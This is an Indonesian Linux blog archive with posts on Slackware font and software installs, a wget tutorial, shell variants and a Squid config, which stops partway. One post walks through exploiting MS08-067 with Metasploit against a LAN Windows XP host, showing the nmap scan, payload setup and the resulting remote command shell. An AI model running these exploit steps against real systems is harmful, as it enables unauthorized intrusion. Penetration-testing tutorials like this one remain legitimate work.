Minggu, 31 Oktober 2010

Install Windows Font di SLACKWARE

Kalian terbiasa dengan widows font yah.. contohnya "Times New Roman" dkk... :)
Tenang bro.. siapa bilang SLACKWARE gak bisa. Yang perlu Anda lakukan cukup menyiapkan kumpulan font windows sebanyak mungkin. Oce... :)

1. Terlebih dahulu kumpulkan font-font Anda di satu direktori (misal=font_win) di home

2. Setelah itu buat direktori "msfont" di /usr/share/fonts/TTF/ untuk lebih jelasnya yang mana font baru yang Anda tambahkan.
  • root@ilho:/# cd /usr/share/fonts/TTF
  • root@ilho:/# mkdir msfont
3. Copy semua font windows Anda di folder msfont tadi
  • root@ilho:/# cp /home/font_win/*.ttf /home/font_win/*.TTF /usr/share/fonts/TTF/msfont/
  • root@ilho:/# chmod 664 /usr/share/fonts/TTF/msfont/*.*
4. Setelah itu tambahkan Path direktori /usr/share/fonts/TTF/msfont/ ke dalam /etc/X11/config dengan cara :
  • root@ilho:/# vi /etc/X11/fs/config
  • diawali dengan koma (,) /usr/share/fonts/TTF/msfont/
  • simpan dengan :wq
Nah,.. Sekarang silahkan Anda membuka openoffice word Anda dan lihat perubahannya.. :).. skarang Anda sudah bisa menggunakan font Times New Roman.. :)
Read more ...

Songbird on Slackware

Pengen dengar musik sambil baca lirik lagu kesayangan Anda.. saatnya Anda install "SONGBIRD" di Slackware kesayangan Anda.

Nah.. klo kalian bingung dapatkan paket dan cara installnya, disini saya akan menuntun Anda bagaimana cara mendapatkan paket dan menuntun Anda bagaimana cara installnya. Skarang yang Anda lakukan cuman menyiapkan segelas kopi hangat dan duduk manis membaca potingan sy ini :).... gmana..? udah siap.. MULAI...!!! hehehe...

1. Silahkan download paket slackbuildnya terlebih dahulu di sini
2. Gmana, udah... ??? lo udah, silahkan extrac file tersebut
  • # tar -zxvf Songbird.tar.gz
  • # cd Songbird
3. Nah skarang kt Download paketnya dengan menggunakan perintah wget.. :)
  • # wget http://download.songbirdnest.com/installer/linux/i686/Songbird_1.4.3-1438_linux-i686.tar.gz
  • # chmod +x Songbird.Slackbuild
  • # ./Songbird.Slackbuild
4. Maka otomatis Songbird akan membuat paket .tgz di folder /tmp. kita tinggal menginstallnya bro..
  • # installpkg /tmp/Songbird-1.4.3_1438-i686-1_SBo.tgz
5. Selesai.... SELAMAT Ber songbird ria... :)
Read more ...

Rabu, 01 September 2010

Wget, The best downloader

Wget merupakan salah satu tool download command line yang paling terkenal, agar Anda bisa mendownload apa saja yang Anda suka, hanya yang Anda suka, dan kapan saja Anda suka. Berhati-hatilah jika menggunakan wget di tempat dengan koneksi Internet yang cepat, sebab kesalahan memakai opsi wget bisa berakibat Anda mendownload banyak halaman tanpa henti hingga beratus-ratus mega atau bergiga-giga. Juga sebaiknya tidak melakukan download masal secara berlebihan pada satu situs, sebab mungkin situs tersebut jadi overload dan terganggu aktivitasnya.

Tentu saja ada banyak tool download lain, baik berbasis grafis maupun command line. Tapi saya akan memfokuskan pada tool command line karena dua hal. Yang pertama, tool command line tersedia di server dan dapat diakses melalui telnet/SSH. Ini penting sekali agar Anda tidak harus selalu online selama download berlangsung. Juga akan meningkatkan efisiensi terutama jika mendownload ribuan file kecil-kecil, karena server umumnya memiliki latensi koneksi yang lebih rendah daripada koneksi dialup rumahan. Setelah semua file Anda download di server, Anda bisa mengemasnya dalam .zip atau .tar.gz dan baru mendownload satu file saja ke rumah. Ini mengirit waktu. Yang kedua, tool command line amat fleksibel, terutama jika dikombinasikan tool-tool command line lainnya. Akan saya demonstrasikan melalui beberapa contoh nanti.

Wget pertama kali ditulis tahun 1995 oleh Hrvoje Niksic dan dirilis di bawah lisensi GNU. Wget dikategorikan sebagai web client tool, WWW retrieval program, dan sering juga disebut web robot.

Installasi

# tar xfz wget-1.8.1.tar.gz
# cd wget-1.8.1
# ./configure --prefix=/usr
# make all install

Tambahkan opsi --with-ssl di baris configure jika Anda ingin dukungan SSL. Setelah semuanya selesai, Anda akan menjumpai wget baru di /usr/bin/wget yang siap melaksanakan kehendak dan titah Baginda

Contoh-contoh Penggunaan Wget

1. Mengambil sebuah URL dengan wget

Cukup sebutkan URL (atau URL-URL) sebagai argumen wget.

$ wget http://mwmag.com

--22:41:14-- http://mwmag.com/
`index.html'
Resolving mwmag.com... done.
Connecting to mwmag.com[202.95.131.154]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
5,219 4.98M/s
22:41:14 (4.98 MB/s) - `index.html' saved [5219]

Kita baru saja menyuruh wget untuk mengambil sebuah URL http://mwmag.com. Wget akan menyimpan ini di file index.html. Pertama-tama wget akan berusaha meresolve (mencari alamat IP) mwmag.com, melakukan koneksi ke server tersebut, lalu mengirim request HTTP untuk meminta URI / ke host mwmag.com.

Untuk mengambil beberapa file, sebutkan saja secara berurutan. http:// bersifat opsional dan boleh tidak kita sebutkan untuk mengirit ketikan.

$ wget mwmag.com/index01.html mwmag.com/index02.html

--22:48:12-- http://mwmag.com/index01.html
`index01.html'
Resolving mwmag.com... done.
Connecting to mwmag.com[202.95.131.154]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified
6,191 5.46K/s
22:48:14 (5.46 KB/s) - `index01.html' saved [6191]
http://mwmag.com/index02.html
`index02.html'
Connecting to mwmag.com[202.95.131.154]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
6,048 5.48K/s
22:48:16 (5.48 KB/s) - `index02.html' saved [6048]
FINISHED --22:48:16--

Downloaded: 12,239 bytes in 2 files

2. Fasilitas “resume”

opsi -c (continue)

$ wget -c ftp://ftp.linux.tucows.com/pub/ISO/RedHat/enigma-i386-disc1.iso

Tanpa opsi -c, jika koneksi putus maka wget akan berhenti, meninggalkan file yang baru setengah terdownload. Saat menjalankan wget lagi, Anda dapat menambahkan -c supaya wget berusaha meresume file setengah jadi itu. Agar praktis, saya biasa selalu menambahkan -c sebagai opsi standar agar resume selalu berusaha dilakukan.

Catatan: tentu saja tidak semua URL dapat diresume. Semua bergantung pada setting webserver. Konten dinamik hasil keluaran skrip misalnya, hampir selalu tidak dapat diresume. Ini berlaku juga bagi program-program download lainnya, jadi ini bukan sebuah keterbatasan wget.

Lawan dari -c adalah -nc (no-clobber). Jika download sebuah file terhenti di tengah, dan Anda menjalankan wget lagi dengan -nc, maka wget tidak akan mengutak-atik file yang baru setengah terdownload sebelumnya, melainkan akan menganggap file itu sudah diambil dan melanjutkan ke URL berikutnya (atau langsung selesai, jika tidak ada lagi URL yang harus didownload).

3. Fasilitas “retry”

Gunakan opsi -t (tries), diikuti sebuah angka.

Dengan opsi ini Anda dapat mengatur berapa kali wget sebaiknya melakukan retry jika koneksi putus di tengah-tengah. -t 2 berarti coba hanya dua kali. Sebutkan -t 0 untuk mencoba tanpa kunjung lelah (alias, sebanyak tak hingga kali). Umumnya memang -t 0 yang dipakai, karena toh kita tidak pernah tahu berapa kali koneksi akan putus di perjalanan. Mirip dengan fitur resume, retry ini hanya bisa dilakukan jika server yang kita mintai mendukungnya. Tepatnya, retry hanya mungkin jika server mengeluarkan header Content-Length, sehingga wget dapat tahu berapa ukuran asli file yang diminta (dan jadi tahu bahwa jika yang terdownload masih lebih kecil ukurannya, berarti memang belum selesai). File-file statik secara otomatis diberi Content-Length oleh IIS, Apache, atau webserver lainnya. Tapi konten dinamik (termasuk PHP/ASP/SSI misalnya) umumnya tidak memberikan Content-Length sehingga wget tidak dapat melakukan retry. Meskipun demikian, ada trik-trik untuk bisa tetap melakukan retry, yang akan ditunjukkan nanti.

Ada opsi lain yang berhubungan dengan retry, yaitu --waitretry, yaitu berapa lama jeda (dalam detik) wget harus menunggu sebelum melakukan koneksi ulang. Defaultnya adalah 0, yaitu langsung mencoba koneksi ulang. Jika server yang kita minta melakukan banning kepada peminta yang terlalu sering melakukan koneksi, maka kita bisa menunggu dulu beberapa saat sebelum retry.

Jadi, berikut perintah untuk melakukan retry terus sampai seluruh file terdownload, tapi menunggu 1 menit di setiap kali sebelum retry. Jangan lupa memberi -c, sebab jika tidak maka wget akan mendownload dari awal setiap kali retry (Meskipun memang, jika servernya tidak mendukung resume, maka dengan -c pun wget harus mendownload dari awal).

$ wget -c -t0 --waitretry 60

ftp://ftp.linux.tucows.com/pub/ISO/RedHat/enigma-i386-disc1.iso

Catatan: meskipun diset -t0, tapi wget akan langsung menyerah jika saat ingin retry ternyata server di ujung sana mati (Connection refused) atau ternyata filenya hilang atau berubah ukuran. Jika Anda yakin file itu masih ada di lokasi yang sama dan Anda ingin wget terus mencoba meskipun server sedang mati, maka bisa dipakai trik membungkus perintah wget dalam loop skrip sederhana. Wget akan mengembalikan status program 0 (sukses) jika file telah terdownload dengan sempurna, tapi 1 jika terputus. Karena itu . Berikut skrip shell Unix untuk melakukannya:

#!/bin/sh
# download terus cd red hat 7.2 sampe aku dapet!
# gak peduli putus berapa kali, gak peduli server di sana mati.

wget -c -t0 --waitretry 60
ftp://ftp.linux.tucows.com/pub/ISO/RedHat/enigma-i386-disc1.iso
sleep 60
done

4. Cara buat download dan supaya bisa ditinggal pergi

Gunakan opsi -b (background).

$ wget -c -t0 –b

http://research.google.com/contest/prog-contest-sample.tar
Continuing in background, pid 6294.
Output will be written to `wget-log'

Karena ada -b, maka wget tidak akan menampilkan progress ke layar, melainkan semuanya akan ditulis dalam file log yang bernama wget-log. Jika di direktori yang sama kebetulan sudah ada file wget-log, maka log akan ditulis ke wget-log.1, dst. Jika Anda intip file log ini, maka isinya sebetulnya sama dengan laporan wget di mode foreground. Jadi wget menulis laporannya ke file dan bukan ke layar.

Setelah memberikan perintah wget (dan juga sebaiknya setelah Anda intip dulu sejenak wget-log untuk memastikan download sudah mulai), Anda dapat langsung log out dan mengecek lagi beberapa jam kemudian, atau keesokan harinya.

Jika Anda mendownload tanpa -b, lalu di tengah jalan karena tidak sabar menunggu Anda memutuskan ingin meninggalkan saja wget ke mode background, maka lakukan hal berikut: tekan Ctrl-Z, lalu ketik kill -HUP %1. Sinyal HUP akan memberi isyarat pada wget agar lalu mengarahkan output laporan ke wget-log dan tidak ke layar lagi. Baru setelah itu download bisa Anda tinggal.

5. Mendownload seluruh isi sebuah situs.

Gunakan opsi -r (recursive).

Di sinilah saat manfaat tool noninteraktif seperti wget membantu kita. Jika kita ingin mendownload seluruh situs lewat browser misalnya, maka Anda mungkin harus melakukan ratusan kali klik dan pemilihan menu. Membosankan sekali. Dengan tool seperti wget, maka sebuah halaman HTML yang dibaca akan diparse dan dicari link-linknya, kemudian masing-masing link ini akan ditelusuri untuk memperoleh dokumen berikutnya, dst. Dengan kombinasi -b, Anda bisa meninggalkan download dan besok-besoknya, seluruh situs sudah termirror buat Anda!

-r menyatakan pada wget bahwa kita ingin menelusuri link. Berikut contoh yang saya buat dan terletak di mwmag.com:

$ wget -r mwmag.com/issue/04/content/hack-wget/file/sample01.html

Di file sample01.html terdapat beberapa link. Wget akan memparse halaman HTML tersebut dan mengambil link-linknya. Dia tidak akan mengikuti link ke situs lain (mis: www.cnn.com) melainkan hanya ke host yang sama (mwmag.com). Halaman yang sudah diambil (mis: sample02.html yang dilink dari sample01.html) akan juga bernasib sama: diparse link-linknya dan diikuti oleh wget. Demikian seterusnya hingga seluruh link yang ada habis terjelajahi. Jika terdapat sejumlah cukup link di awal penelusuran, seluruh objek di mwmag.com yang terjamah dan publik akan bisa terjaring dan terdownload.

File-file yang didownload secara otomatis akan disimpan dalam struktur direktori mengikuti struktur URL asli. Misalnya, http://mwmag.com/issue/04/content/ akan disimpan di file index.html yang berada di subdirektori mwmag.com/issue/04/. Pengaturan ini akan memudahkan dalam mirroring (dijelaskan nanti). Catatan: Jika Anda ingin URL disimpan dalam struktur seperti ini meskipun tanpa harus melakukan download rekursif, beri opsi -x (force directories). Contoh: wget -x mwmag.com/issue/04/.

Pada umumnya Anda jarang butuh harus mendownload seluruh isi situs. Kadang hanya ingin mengambil hingga kedalaman tertentu saja, kadang hanya jenis file tertentu saja, kadang hanya ingin mengambil satu cabang situs saja (mis: /archive/2001/), atau Anda hanya ingin mengambil satu halaman beserta objek-objeknya saja (imej, JS/CSS) tanpa benar-benar bermaksud mendownload rekursif.

6. Mengambil situs satunet.com hingga tiga-empat level saja.

Gunakan -l (level).

Sebetulnya rekan kerja saya di satunet.com dulu benar-benar pernah minta ini. Dia anggota tim advertising yang ingin mendemonstrasikan portal Satunet ke calon pengiklan. Diinginkan agar situs satunet.com didownload ke laptop dan bisa dibrowse offline (“bisa diceklak-ceklik”). Tidak perlu seluruh isi situs (karena itu akan menghabiskan ruang disk ratusan MB), tapi cukup hingga tiga atau empat level saja agar jika kita mengklik sebuah halaman dari halaman depan, di halaman kedua itu kita masih bisa mengklik sesuatu, dan sekali lagi demikian.

Kita memberikan opsi -l untuk mengatur berapa level, atau kedalaman penelusuran. Jika tidak disebutkan (hanya -r), maka wget menganggap -l0, alias sampai kedalaman tak hingga (atau sampai semua link di situs ybs habis). Untuk memenuhi permintaan download empat level, kita berikan perintah ini:

$ wget -r -l4 -k http://satunet.com

Untuk apa -k (convert links)? Opsi ini penting jika kita ingin hasil download bisa dibrowse offline. -k akan mengkonversi link-link absolut (ke http://satunet.com/...) sehingga menjadi link relatif.

Tip: Anda juga bisa tambahkan -c dan -t untuk menambah reliabilitas, tapi waktu itu saya mendownload dari jaringan yang sama, jadi tidak ada masalah dengan kecepatan atau stabilitas koneksi.

Catatan: Grab rekursif memakai -r, -l0 (apalagi jika nanti Anda menggunakan -H) potensial berbahaya, karena Anda tidak pernah tahu berapa ukuran total sebuah situs. Jika di situs tersebut terdapat link yang dihasilkan secara dinamik (mis: /browseProduct.cgi?cat=foo yang lalu memuntahkan puluhan link lain), maka Anda bisa saja pada akhirnya menuai beratus-ratus halaman yang tidak diinginkan. Semakin cepat koneksi ke server, semakin berbahayalah, sebab Anda bisa membuat wget berkelana dan tersesat di rimba Web sambil mendownload segudang sampah.

7. Mengambil hanya halaman HTML dari tucows.mweb.co.id (dengan kata lain, ingin mengambil katalog HTML-nya).

Gunakan opsi -A (accept list), diikuti dengan daftar akhiran file yang diinginkan dan dipisahkan dengan koma.

$ wget -r -A htm,html -k tucows.mweb.co.id

8. Mengambil semua gambar yang ada di situs satulelaki.com.

Mungkin Anda berpikir menggunakan -A gif,jpg,jpeg. Tapi tunggu dulu: tanpa mengambil halaman HTML-nya juga, bagaimana Anda bisa menelusuri halaman demi halaman untuk menemukan gambarnya?

$ wget –c –t0 -r -A htm,html,gif,jpg,jpeg –k satulelaki.com

9. Mengambil semua file yang ada di mwmag.com, tapi tidak ingin mengambil PDF-nya.

Gunakan opsi -R (reject list). Perhatikan, ini berbeda dengan -r (huruf kecil). -R adalah lawan dari -A, yaitu untuk mengambil semua file berakhiran apa saja, kecuali yang disebutkan di daftar hitam.

$ wget -r –k -R pdf mwmag.com

10. Mengambil halaman depan www.detik.com lengkap dengan gambar, iklan, dan semuanya.

Gunakan opsi -p (page requisites).

$ wget -p www.detik.com

11. Mengambil seluruh file di www.master.web.id/tutorial/ (tapi tidak ingin mengambil file di section yang lain).

Gunakan opsi -np (no parent) sebagai pembatas -r. Dengan cara ini, -r tidak akan menelusuri ke atas path.

$ wget -r –k –np –l0 www.master.web.id/tutorial/

12. Mngambil keseluruhan file HTML dan gambar di www.master.web.id/, tapi tidak ingin mengambil bagian forum, cgi-bin, download, dan daerah-daerah dinamik lainnya yang tidak diinginkan.

Gunakan opsi -X (exclude directories), diikuti daftar direktori yang tidak ingin diikutsertakan dan dipisahkan dengan koma. Bedakan ini dengan -R. -R membatasi jenis file, -X membatasi direktori.

$ wget –r –l0 –A htm,html,gif,jpg,jpeg www.master.web.id

13. Download yang sebelumnya sudah selesai, tapi saya lupa saya ingin mengambil juga file-file PNG, ZIP, FLA, dan SWF. Tapi saya tidak ingin mendownload semuanya dari awal.

Masih ingat opsi -nc? Kali ini berguna buat kita.

$ wget -r –l0 –nc –A htm,html,gif,jpg,jpeg,png,zip,fla,swf www.master.web.id

File-file yang sudah didownload tidak akan didownload lagi, tapi tetap diparse untuk mencari link.

Gunakan opsi -X (exclude directories), diikuti daftar direktori yang tidak ingin diikutsertakan dan dipisahkan dengan koma. Bedakan ini dengan -R. -R membatasi jenis file, sementara -X membatasi direktori.

Ada lagi opsi -I (include directories) yang merupakan kebalikan -X. Silakan dicoba sendiri efeknya.

Tambahan:
Mirroring

Keinginan: Saya sudah mendownload seluruh cabang situs steven.haryan.to/email/. Sekarang saya lihat beberapa dokumen ada yang diupdate. Saya ingin pula mengupdate kopi lokal saya, tapi malas jika harus mendownload ulang semuanya.

Jawab: gunakan opsi -m (mirror). Dengan menyebutkan -m saja, Anda telah menginstruksikan wget untuk melakukan -r -N -l0 -nr. Detail tiap opsi bisa Anda baca di manual wget, yang jelas, -m ini digunakan untuk melakukan mirroring sebuah situs dan untuk mengupdatenya manakala perlu.

$ wget -m -np steven.haryan.to/email/

Pertama kali Anda menjalankan ini hingga selesai, cabang /email di homepage saya telah Anda download. Jika Anda jalankan lagi untuk kedua kalinya, wget akan mengecek dan membandingkan usia tiap file yang telah didownload dengan yang di server. Jika tidak ada yang lebih baru dari server, maka tidak ada yang didownload ulang. Enak bukan?

Sumber : http://ajie.web.id/index.php?option=com_content&task=view&id=23&Itemid=28
Read more ...

Jumat, 27 Agustus 2010

Metasploit : Teknik Dasar

Posting ini kubuat sebagai salah satu contoh audit security halah.. pentest aja yah bahasanya di network lokal tempatku bekerja. Ndak pake kata-kata hacking lah.. Wong cuman manfaatin tools yang disebar di inet kok disebut hacking :p. Soalnya banyak kale yang test metasploit seperti ini dan dibilang hacking bla-bla-bla. :-p. Go to side corner lamerzz… Post ini juga buat bayar utang ma hardie soal metasploit :D Ini coy dah kutepatin janjinya. silahkan coba sendiri ya. cara yang paling mudah sebenarnya bisa menggunakan OS BackTrack, tapi disini saya menggunakan ubuntu yang telah diinstall metasploit. Langkah instalasinya bisa dilihat disini.

Metasploit : msfconsole
Lets go.. pertama kali kita coba dengan testing manual menggunakan metasploit console (msfconsole) yang mana test ini dilakukan pada single mesin windows xp sp2 dengan melakukan percoban exploit ms windows MS08-067 yaitu vulner pada microsoft windows di port 445 beberapa waktu yang lalu yang sempet bikin microsoft kelimpungan :D . Dari terminal console ketik perintah berikut, seperti pada gambar dibawah:

$ msfconsole


Untuk perintah-perintah lainnya bisa dipelajari dengan mengetikkan help :

    msf > help
    Core Commands
    =============

    Command Description
    ------- -----------
    ? Help menu
    back Move back from the current context
    banner Display an awesome metasploit banner
    cd Change the current working directory
    connect Communicate with a host
    exit Exit the console
    help Help menu
    info Displays information about one or more module
    irb Drop into irb scripting mode
    jobs Displays and manages jobs
    load Load a framework plugin
    loadpath Searches for and loads modules from a path
    quit Exit the console
    resource Run the commands stored in a file
    route Route traffic through a session
    save Saves the active datastores
    search Searches module names and descriptions
    sessions Dump session listings and display information about sessions
    set Sets a variable to a value
    setg Sets a global variable to a value
    show Displays modules of a given type, or all modules
    sleep Do nothing for the specified number of seconds
    unload Unload a framework plugin
    unset Unsets one or more variables
    unsetg Unsets one or more global variables
    use Selects a module by name
    version Show the framework and console library version numbers

Untuk melihat list exploits-nya , gunakan perintah :

    msf > show exploits

List seluruh exploit yang ada kira-kira seperti ini (saya paste sebagian saja biar ndak terlalu panjang) :

    windows/smb/ms05_039_pnp              Microsoft Plug and Play Service Overflow
    windows/smb/ms06_025_rasmans_reg Microsoft RRAS Service RASMAN Registry Overflow
    windows/smb/ms06_025_rras Microsoft RRAS Service Overflow
    windows/smb/ms06_040_netapi Microsoft Server Service NetpwPathCanonicalize Overflow
    windows/smb/ms06_066_nwapi Microsoft Services MS06-066 nwapi32.dll
    windows/smb/ms06_066_nwwks Microsoft Services MS06-066 nwwks.dll
    windows/smb/ms08_067_netapi Microsoft Server Service Relative Path Stack Corruption

Scan mesin target menggunakan nmap. Dalam contoh kasus kali ini kita gunakan kompi dg ip 192.168.1.28 :

    msf > sudo nmap -v -sS -A -O 192.168.1.28
    [*] exec: sudo nmap -v -sS -A -O 192.168.1.28
    [sudo] password for test:Starting Nmap 4.62 ( http://nmap.org ) at 2009-03-21 23:50 CIT
    Initiating ARP Ping Scan at 23:50
    Scanning 192.168.1.28 [1 port]
    Host 192.168.1.28 appears to be up ... good.
    Interesting ports on 192.168.1.28:
    Not shown: 1712 closed ports
    PORT STATE SERVICE VERSION
    135/tcp open msrpc Microsoft Windows RPC
    139/tcp open netbios-ssn
    445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
    MAC Address: 00:1E:8C:67:59:F9 (Asustek Computer)
    Device type: general purpose
    Running: Microsoft Windows XP
    OS details: Microsoft Windows 2000 SP4, or Windows XP SP2 or SP3
    Network Distance: 1 hop
    TCP Sequence Prediction: Difficulty=258 (Good luck!)
    IP ID Sequence Generation: Incremental
    Service Info: OS: Windows

Dari hasil scan kita ketahui bahwa kemungkinan OS-nya menggunakan OS Windows XP dengan port 445-nya terbuka. Mari kita coba kompi ini dengan menggunakan exploit windows/smb/ms08_067_netapi.

    msf > use windows/smb/ms08_067_netapi
    msf exploit(ms08_067_netapi) >

Lihat opsi dari exploit ini dengan mengetikkan show options :

    msf exploit(ms08_067_netapi) > show options
    Module options:
    Name Current Setting Required Description
    ---- --------------- -------- -----------
    RHOST yes The target address
    RPORT 445 yes Set the SMB service port
    SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

    Exploit target:
    Id Name
    -- ----
    0 Automatic Targeting

Dari opsi diatas, maka kita perlu set terlebih dahulu RHOST ( komputer target) dengan mengetikkan :

    msf exploit(ms08_067_netapi) > set rhost 192.168.1.28
    rhost => 192.168.1.28

Untuk RPORT, kita tidak perlu melakukan setting apa-apa karena vulnerability ini memang mengeksploitasi vulnerability di port 445. Untuk exploit target diisi dengan OS komputer target. Dalam langkah ini kita menggunakan angka 0 yang berarti automatic target. Untuk melihat OS target apa saja, ketik :

    msf exploit(ms08_067_netapi) > show targets
    Exploit targets:
    Id Name
    -- ----
    0 Automatic Targeting
    1 Windows 2000 Universal
    2 Windows XP SP0/SP1 Universal
    3 Windows XP SP2 English (NX)
    4 Windows XP SP3 English (NX)
    -------- cut -----------

Sekarang kita tentukan jenis payload yang ingin dipakai. Dalam langkah ini saya ingin menggunakan tcp_bind shell (akses command prompt di kompi target) :

    msf exploit(ms08_067_netapi) > set payload windows/shell_bind_tcp
    payloads => windows/shell_bind_tcp

Untuk melihat payload apa saja dalam metasploit, gunakan perintah :

    msf exploit(ms08_067_netapi) > show payloads
    Compatible payloads
    ===================
    Name Description
    ---- -----------
    generic/debug_trap Generic x86 Debug Trap
    generic/debug_trap/bind_ipv6_tcp Generic x86 Debug Trap, Bind TCP Stager (IPv6)
    generic/debug_trap/bind_nonx_tcp Generic x86 Debug Trap, Bind TCP Stager (No NX Support)
    generic/debug_trap/bind_tcp Generic x86 Debug Trap, Bind TCP Stager
    ----------- dipotong sampai disini ---------------

Nahh.. setting sudah selesai dilakukan. Untuk melihat hasil konfigurasinya bisa dicek kembali dengan menggunakan show options :

    msf exploit(ms08_067_netapi) > show options
    Module options:
    Name Current Setting Required Description
    ---- --------------- -------- -----------
    RHOST 192.168.1.28 yes The target address
    RPORT 445 yes Set the SMB service port
    SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

    Payload options (windows/shell_bind_tcp):
    Name Current Setting Required Description
    ---- --------------- -------- -----------
    EXITFUNC thread yes Exit technique: seh, thread, process
    LPORT 4444 yes The local port
    RHOST 192.168.1.28 no The target address
    Exploit target:
    Id Name
    -- ----
    0 Automatic Targeting

sekarang jalankan exploit :

    msf exploit(ms08_067_netapi) > exploit
    [*] Started bind handler
    [*] Automatically detecting the target...
    [*] Fingerprint: Windows XP Service Pack 2 - lang:English
    [*] Selected Target: Windows XP SP2 English (NX)
    [*] Triggering the vulnerability...
    [*] Command shell session 1 opened (192.168.1.6:33270 -> 192.168.1.28:4444)

    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    C:\WINDOWS\system32>ipconfig
    ipconfig
    Windows IP Configuration
    Ethernet adapter Local Area Connection:

    Connection-specific DNS Suffix . :
    IP Address. . . . . . . . . . . . : 192.168.1.28
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . : 192.168.1.254

    C:\WINDOWS\system32>

Dan ternyata emang masih bolong… :p

Metasploit : msfcli
Dari langkah-langkah diatas… sebenarnya bisa dilakukan exploitasi dengan menggunakan satu perintah dari console, dan diakomodir dengan menggunakan msfcli yang notabene sebenarnya adalah metasploit command line interface.
Untuk melihat manual perintahnya bisa dilihat dari help maupun manpage-nya wiki-nya metasploit.

    bash-4.1$ msfcli –help
    [*] Please wait while we load the module tree...
    Error: Invalid module: --help
    Usage: /usr/local/bin/msfcli [mode]
    =================================================================
    Mode Description
    ---- -----------
    (H)elp You're looking at it baby!
    (S)ummary Show information about this module
    (O)ptions Show available options for this module
    (A)dvanced Show available advanced options for this module
    (I)DS Evasion Show available ids evasion options for this module
    (P)ayloads Show available payloads for this module
    (T)argets Show available targets for this exploit module
    (AC)tions Show available actions for this auxiliary module
    (C)heck Run the check routine of the selected module
    (E)xecute Execute the selected module

So.. mari kita coba. Contoh kasusnya sama seperti artikel msfconsole biar ndak capek nulisnya yaitu:

    IP Addr Target : 192.168.1.28
    Port target : 445
    Exploit : windows/smb/ms08_067_netapi
    Payload : windows/shell_bind_tcp
    Exploit target : 0

Dan implementasinya menjadi seperti ini :

    bash$ msfcli exploit/windows/smb/ms08_067_netapi RHOST=192.168.1.28 TARGET=0 PAYLOAD=generic/shell_bind_tcp E
    [*] Please wait while we load the module tree...
    [*] Started bind handler
    [*] Automatically detecting the target...
    [*] Fingerprint: Windows XP Service Pack 2 - lang:English
    [*] Selected Target: Windows XP SP2 English (NX)
    [*] Triggering the vulnerability...
    [*] Command shell session 1 opened (192.168.1.6:36804 -> 192.168.1.28:4444)

    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    C:\WINDOWS\system32>ipconfig
    ipconfig
    Windows IP Configuration
    Ethernet adapter Local Area Connection:
    Connection-specific DNS Suffix . :
    IP Address. . . . . . . . . . . . : 192.168.1.28
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . : 192.168.1.254
    C:\WINDOWS\system32>
Implementasi yang sama juga bisa dilakukan pada metasploit GUI (msfgui) dan metasploit berbasis web (msfweb). Silahkan dicoba sendiri karena saya malas upload gambarnya :-p. Dari teknik dasar ini silahkan dikembangkan dengan teknik-teknik yang lain.

Sumber : http://www.masrony.com/2009/03/metasploit-i-teknik-dasar/
Read more ...

Rabu, 25 Agustus 2010

Instalasi Metasploit Framework On SLACKWARE

Apa itu

Metasploit Framework ?

Metasploit Framework adalah sebuah platform pengembangan untuk membuat tool keamanan dan exploit. Metasploit framework digunakan oleh profesional bidang keamanan jaringan untuk melakukan tes penetrasi, digunakan juga oleh administrator sistem untuk memverifikasi instalasi dan patch sistemnya, vendor produk untuk melakukan tes kelemahan dan peneliti-peneliti keamanan lainnya di dunia. Metasploit framework ditulis menggunakan bahasa pemrograman Ruby dan termasuk juga komponen lainnya yang ditulis dalam bahasa C dan assembler.

Terdiri dari apa saja?

Metasploit Framework terdiri dari tools, libraries, modules dan user interfaces. Fungsi dasar dari metasploit framework adalah memunculkan module, membiarkan penggunanya mengkonfigurasikan modul exploit dan mencobanya pada target yang dituju. Jika exploit berhasil, payload akan tereksekusi pada sistem target dan pengguna akan disediakan sebuah shell untuk berinteraksi dengan payload.

Download

Saat ini tersedia dalam versi 3.4.3. Dapat didownload di Sini

Instalasi

Proses penginstalan tidak begitu sulit, ada baiknya Anda mendownload dengan perintah wget di consule :)

# wget http://www.metasploit.com/releases/framework-3.4.1-linux-i686.run

Setelah proses download sudah selesai, saatnya kita pasang di slackware kesayangan kita

# ./framework-3.4.1-linux-i686.run

ikuti prosesnya sampai selesai, dan jalankan dengan perintah

# msfconsole --> untuk mode consule
# msfweb --> untuk mode web

Biarkan program msfweb berjalan di terminal, jika ingin menghentikan cukup gunakan Ctrl-C. Buka browser dan ketik di url http://127.0.0.1:55555/

Read more ...

Rabu, 04 Agustus 2010

Beberapa Varian Dalam Shell

Bourne shell
#!/usr/bin/sh atau #!/bin/sh

Korn shell
#!/usr/bin/ksh atau #!/bin/ksh

C shell
#!/usr/bin/csh atau #!/bin/csh

Bourne-Again shell
#!/usr/bin/bash atau #!/bin/bash

Bagaimana shell yang kita gunakan ?
$shell

Kita pun dapat berpindah shell dengan cara :
$chsh -s /bin/sh -----> bourne shell
$chsh -s /bin/csh -----> c shell
$chsh -s /bin/bash -----> bourne-again shell
$chsh -s /bin/ksh -----> korn shell
Read more ...

Senin, 02 Agustus 2010

Squid On Slackware 13.1

Assalamu'alaikum wr.wb.
Baru - baru ini saya memasang squid server di kantor saya tepatnya di Patria Artha, dan Alhamdulillah semua berjalan dengan normal di tiap-tiap router saya. Tanpa berbasa-basi mari kita bahas satu persatu mulai dari awal. Goo TOooo SLack.. :)

Pertama silahkan Download terlebih dahulu paket squidnya. Squid yang saya gunakan yaitu squid Version 3.0.STABLE19. Download di sini

Masuk ke terminal or konsole dan login sebagai root untuk menginstall paket squid, dengan perintah :

# upgradepkg --install-new squid*.txz


setelah berhasil terinstall kita tinggal konfigurasi squid.conf yang ada di /etc/squid/squid.conf. Karena file squid.conf belum ada maka kita bisa mencopy terlebih dahulu dengan perintah :

# cp /etc/squid/squid.conf.default /etc/squid/squid.conf

silahkan konfigurasi squid.conf Anda. Adapun Konfigurasi squid yang saya punya yaitu :

http_port 3128 transparent
visible_hostname router_tiga

cache_mem 2048 MB

maximum_object_size 2048000 KB
